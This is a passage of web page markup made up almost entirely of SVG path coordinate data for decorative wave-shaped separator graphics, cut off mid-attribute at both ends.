d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M593.88,22.35a11,11,0,0,0-2.19,4c-.27,1.18.34,2.56,0,4.16-.47-.63-1.3-1.23-1.35-1.89-.15-2.13-.47-3.36-3.23-2.79-.81.16-2.08-1.93-3-2.08l-13.75,3.14c.09,1.25.18,2.5.31,4.21l3.47-2.63c-.11,2.12-.16,3.26-.22,4.4.86,1.09,1.77,3.13,2.55,3.08,2.1-.13,4.13-1.17,6.19-1.84a7.84,7.84,0,0,1,2.46-.46c.81.12,2,1.24,2.25,1,2.3-2,4.45-1.47,7.06-.56,1.14.4,3.79-.72,4.26-1.8,1-2.32,2.63-2.12,4.42-2.16a35,35,0,0,1,4.6,4.14c2.27,2.9,4,3.48,6.9,1.64l2.9-2.16a28,28,0,0,0-4.47-.2c-2.5.27-3.81-.73-4.28-3.14-1.15-5.81-3.88-6.79-8.81-6.51-1.31.07-2.66-.83-4-1.23C595.25,22.46,594.08,22.08,593.88,22.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M840.13,15.47a34.57,34.57,0,0,0-5.42-2.36,79.56,79.56,0,0,0-9-1.52c-17.69-2.24-35.35-5-53.11-6.47-15.17-1.27-30.47-1.2-45.71-1.52-3.82-.08-8-1.2-11.32,2a1,1,0,0,1-1,.09c-2.93-3-5.59-.7-8.32.37-4.62.08-9.25.13-13.88.27a15.85,15.85,0,0,0-2.84.56,20,20,0,0,0,3.75.77c5.35.11,10.71.08,16.06.09L714.1,7c1.65.72,3.2,1.14,4.27-1a1.85,1.85,0,0,1,1.26-1c3.61.13,7.22.38,10.83.6l4,0,7.61.72,1.29-.11c1.7,0,3.4,0,5.09.17,1.53.15,3.28,1.13,4.53.66,7-2.64,14.1-.47,21.12-.67,4.07-.12,8.2,1.38,12.27,2.29.76.16,1.39.94,2.08,1.44h1.74c2.16-2.4,4.22-1.09,6.28.17l4-.62c5.66.68,11.33,1.34,17,2.05a5.11,5.11,0,0,1,1.43.7l4,0,2.16,1.18c2.65.24,5.3.69,8,.67a4.6,4.6,0,0,1,4.76,2.91,3.36,3.36,0,0,0,2,1c1.77-2.47,4.07-1.38,6.33-1.25,1.11.07,2.27-.75,3.4-1.17C846.24,15.49,842.76,11.56,840.13,15.47Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path 